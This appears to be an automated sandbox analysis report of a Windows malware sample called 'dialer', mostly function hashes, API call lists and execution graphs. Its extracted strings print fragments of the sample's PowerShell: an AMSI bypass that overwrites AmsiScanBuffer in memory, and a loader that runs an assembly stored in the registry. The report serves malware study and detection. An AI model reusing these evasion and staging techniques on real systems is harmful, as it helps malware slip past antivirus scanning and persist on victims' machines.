                                                                  • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                  • API String ID: 3242894177-3709903795
                                                                  • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                                  • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394
                                                                  Function 000000014000117C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 281memorycomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                  • String ID: SYSTEM$dialersvc64$powershell
                                                                  • API String ID: 3960698109-174983134
                                                                  • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                                  • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                                  • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                                  • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700
                                                                  Function 0000000140001614 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 121memorycomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                  • String ID: dialersvc64
                                                                  • API String ID: 2407135876-3881820561
                                                                  • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                                  • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                                  • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                                  • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340
                                                                  Function 0000000140001984 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                                  • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                                  • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                                  • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                                    • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                                    • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                                    • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                                    • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                                    • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                                    • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                                    • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                                    • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                                    • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                                    • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                                    • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                                    • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                                    • Part of subcall function 000000014000117C: CoInitializeEx.OLE32 ref: 0000000140001200
                                                                    • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                                    • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                                    • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                                    • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                                    • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                                    • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                                    • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                                    • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                                    • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                                    • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                                  • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                                  • API String ID: 2204944113-1859800454
                                                                  • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                                  • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                                  • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                                  • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600
                                                                  Function 00000001400017EC Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                  • String ID:
                                                                  • API String ID: 4184240511-0
                                                                  • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                                  • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                                  • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                                  • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300
                                                                  Function 0000000140001C0C Relevance: 3.8, APIs: 3, Instructions: 40stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 168 140001c0c-140001c47 lstrlenW call 140001070 171 140001c49-140001c58 StrStrIW 168->171 172 140001c7c-140001c99 168->172 171->172 173 140001c5a 171->173 174 140001c5d-140001c7a StrStrIW 173->174 174->172 174->174
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID:
                                                                  • API String ID: 1659193697-0
                                                                  • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                                  • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                                  • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                                  • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740
                                                                  Function 0000000140001970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 175 140001970-14000197b call 140001984 ExitProcess
                                                                  APIs
                                                                    • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                                    • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                                    • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                                    • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                                    • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                                    • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                                  • ExitProcess.KERNEL32 ref: 000000014000197B
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                                  • String ID:
                                                                  • API String ID: 3836967525-0
                                                                  • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                                  • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                                  • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                                  • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                                  Non-executed Functions

                                                                  Function 000000014000114C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 187 14000114c-140001165 GetModuleHandleA 188 140001174-140001178 187->188 189 140001167-14000116e GetProcAddress 187->189 189->188
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlGetVersion$ntdll.dll
                                                                  • API String ID: 1646373207-1489217083
                                                                  • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                                  • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                                  • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                                  • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

                                                                  Execution Graph

                                                                  Execution Coverage:2.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:897
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 2986 140001ac3 2989 140001a70 2986->2989 2987 14000199e 2991 140001a0f 2987->2991 2993 1400019e9 VirtualProtect 2987->2993 2988 140001b36 2990 140001ba0 4 API calls 2988->2990 2989->2987 2989->2988 2992 140001b53 2989->2992 2990->2992 2993->2987 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2100 140001bc2 2098->2100 2099 140001c04 memcpy 2099->2096 2100->2099 2102 140001c45 VirtualQuery 2100->2102 2103 140001cf4 2100->2103 2102->2103 2107 140001c72 2102->2107 2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 2106 140001ca4 VirtualProtect 2106->2099 2106->2104 2107->2099 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006620 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtOpenKey 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2217 140002218 2212->2217 2215 14000220b LeaveCriticalSection 2213->2215 2220 14000212e 2213->2220 2214 140002272 2215->2217 2216 140002241 DeleteCriticalSection 2216->2214 2217->2214 2217->2216 2219 140002230 free 2217->2219 2218 14000214d TlsGetValue GetLastError 2218->2220 2219->2216 2219->2219 2220->2215 2220->2218 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2994 140001f47 2995 140001e67 signal 2994->2995 2996 140001e99 2994->2996 2995->2996 2997 140001e7c 2995->2997 2997->2996 2998 140001e82 signal 2997->2998 2998->2996 2113 14000216f 2114 140002178 InitializeCriticalSection 2113->2114 2115 140002185 2113->2115 2114->2115 2116 140001a70 2117 14000199e 2116->2117 2120 140001a7d 2116->2120 2118 140001a0f 2117->2118 2119 1400019e9 VirtualProtect 2117->2119 2119->2117 2120->2116 2121 140001b53 2120->2121 2122 140001b36 2120->2122 2123 140001ba0 4 API calls 2122->2123 2123->2121 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 2999 140002050 3000 14000205e EnterCriticalSection 2999->3000 3001 1400020cf 2999->3001 3002 1400020c2 LeaveCriticalSection 3000->3002 3003 140002079 3000->3003 3002->3001 3003->3002 3004 1400020bd free 3003->3004 3004->3002 3005 140001fd0 3006 140001fe4 3005->3006 3007 140002033 3005->3007 3006->3007 3008 140001ffd EnterCriticalSection LeaveCriticalSection 3006->3008 3008->3007 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 14000199e 2239->2240 2241 140001b36 2239->2241 2244 140001b53 2239->2244 2243 140001a0f 2240->2243 2245 1400019e9 VirtualProtect 2240->2245 2242 140001ba0 4 API calls 2241->2242 2242->2244 2245->2240 2080 140001394 2084 140006620 2080->2084 2082 1400013b8 2083 1400013c6 NtOpenKey 2082->2083 2085 14000663e 2084->2085 2088 14000666b 2084->2088 2085->2082 2086 140006713 2087 14000672f malloc 2086->2087 2089 140006750 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006bc0 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003240 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 76 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2278 14000194d 2274->2278 2279 140001a20 2274->2279 2275 140001ba0 4 API calls 2275->2278 2276 14000199e 2276->2273 2277 1400019e9 VirtualProtect 2276->2277 2277->2276 2278->2275 2278->2276 2279->2276 2280 140001b36 2279->2280 2282 140001b53 2279->2282 2281 140001ba0 4 API calls 2280->2281 2281->2282 2286 140003256 2283->2286 2284 140003371 wcslen 2393 14000153f 2284->2393 2286->2284 2288 14000356e 2288->2265 2291 14000346c 2294 140003492 memset 2291->2294 2296 1400034c4 2294->2296 2297 140003514 wcslen 2296->2297 2298 14000352a 2297->2298 2302 14000356c 2297->2302 2299 140003540 _wcsnicmp 2298->2299 2300 140003556 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003631 wcscpy wcscat memset 2304 140003670 2301->2304 2302->2301 2303 1400036b3 wcscpy wcscat memset 2305 1400036f6 2303->2305 2304->2303 2306 1400037fe wcscpy wcscat memset 2305->2306 2307 140003840 2306->2307 2308 140003b92 wcslen 2307->2308 2309 140003ba0 2308->2309 2313 140003bdb 2308->2313 2310 140003bb0 _wcsnicmp 2309->2310 2311 140003bc6 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003cea wcscpy wcscat memset 2314 140003d2c 2312->2314 2313->2312 2315 140003d6f wcscpy wcscat memset 2314->2315 2317 140003db5 2315->2317 2316 140003de5 wcscpy wcscat 2318 140006192 memcpy 2316->2318 2320 140003e17 2316->2320 2317->2316 2318->2320 2319 140003f6a wcslen 2322 140003faf 2319->2322 2320->2319 2321 140004014 wcslen memset 2533 14000157b 2321->2533 2322->2321 2324 1400046af memset 2326 1400046de 2324->2326 2325 140004723 wcscpy wcscat wcslen 2574 14000146d 2325->2574 2326->2325 2330 140004699 2331 14000145e 2 API calls 2330->2331 2334 140004694 2331->2334 2332 1400048c3 2339 140004902 memset 2332->2339 2333 14000157b 2 API calls 2365 14000413d 2333->2365 2334->2324 2337 140004833 2660 1400014a9 2337->2660 2338 1400048df 2344 14000145e 2 API calls 2338->2344 2342 140006273 2339->2342 2343 140004926 wcscpy wcscat wcslen 2339->2343 2384 140004a50 2343->2384 2344->2332 2347 1400048cf 2352 14000145e 2 API calls 2347->2352 2348 14000145e 2 API calls 2348->2365 2350 1400044c4 _wcsnicmp 2354 14000467c 2350->2354 2350->2365 2352->2332 2355 14000145e 2 API calls 2354->2355 2357 140004688 2355->2357 2356 1400048b7 2358 14000145e 2 API calls 2356->2358 2361 14000145e 2 API calls 2357->2361 2358->2332 2359 140004522 _wcsnicmp 2359->2354 2359->2365 2360 140004b49 wcslen 2362 14000153f 2 API calls 2360->2362 2361->2334 2362->2384 2363 140005d8f memcpy 2363->2384 2364 140004576 _wcsnicmp 2364->2354 2364->2365 2365->2324 2365->2330 2365->2333 2365->2348 2365->2350 2365->2359 2365->2364 2366 140004347 wcsstr 2365->2366 2550 140001599 2365->2550 2563 1400015a8 2365->2563 2366->2354 2366->2365 2367 140004cbd wcslen 2368 14000153f 2 API calls 2367->2368 2368->2384 2369 14000512d wcslen 2371 14000153f 2 API calls 2369->2371 2370 140004ec9 wcslen 2372 14000157b 2 API calls 2370->2372 2371->2384 2372->2384 2373 140004f4c memset 2373->2384 2374 140005a21 wcscpy wcscat wcslen 2377 140001422 2 API calls 2374->2377 2375 140005f5d memcpy 2375->2384 2376 14000145e NtOpenKey malloc 2376->2384 2377->2384 2378 140004fb6 wcslen 2379 1400015a8 2 API calls 2378->2379 2379->2384 2382 14000501e _wcsnicmp 2382->2384 2383 140005b6c 2383->2265 2384->2360 2384->2363 2384->2367 2384->2369 2384->2370 2384->2373 2384->2374 2384->2375 2384->2376 2384->2378 2384->2382 2384->2383 2385 140005c17 wcslen 2384->2385 2387 1400057c5 memset 2384->2387 2388 1400059c0 memset 2384->2388 2389 1400027d0 11 API calls 2384->2389 2390 14000582b memset 2384->2390 2391 140005885 wcscpy wcscat wcslen 2384->2391 2776 1400014d6 2384->2776 2821 140001521 2384->2821 2919 140001431 2384->2919 2386 1400015a8 2 API calls 2385->2386 2386->2384 2387->2384 2387->2388 2388->2384 2389->2384 2390->2384 2850 140001422 2391->2850 2394 140001394 2 API calls 2393->2394 2395 14000154e 2394->2395 2396 140001394 2 API calls 2395->2396 2397 14000155d 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000156c 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000157b 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000158a 2402->2403 2404 140001394 2 API calls 2403->2404 2405 140001599 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400015a8 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015b7 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015c6 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015d5 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015e4 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015f3 2416->2417 2417->2288 2418 140001503 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000150d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001512 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001521 2423->2424 2425 140001394 2 API calls 